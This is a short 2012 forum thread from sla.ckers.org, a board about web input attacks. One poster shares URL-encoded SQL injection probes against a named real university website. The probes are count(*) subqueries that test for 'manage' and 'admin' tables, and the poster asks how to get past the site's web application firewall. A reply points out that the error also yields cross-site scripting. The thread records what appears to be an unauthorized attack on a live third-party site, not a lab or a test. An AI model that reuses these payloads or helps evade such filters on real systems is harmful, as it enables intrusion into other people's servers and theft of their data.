Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
a weird injection...
Posted by: Desperado
Date: May 14, 2012 05:32AM

Web: http://jsjx.hnie.edu.cn/style.asp?id=1360

The WAF shows that we can't use "and update insert...."

If I inject "http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20manage%29%3E0"

it shows me some information: the table manage does not exist.

But if I use http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20admin%29%3E0

the WAF appears.
Any help?????

Re: a weird injection...
Posted by: Skyphire
Date: May 14, 2012 08:09PM

Well, at least you got an XSS.
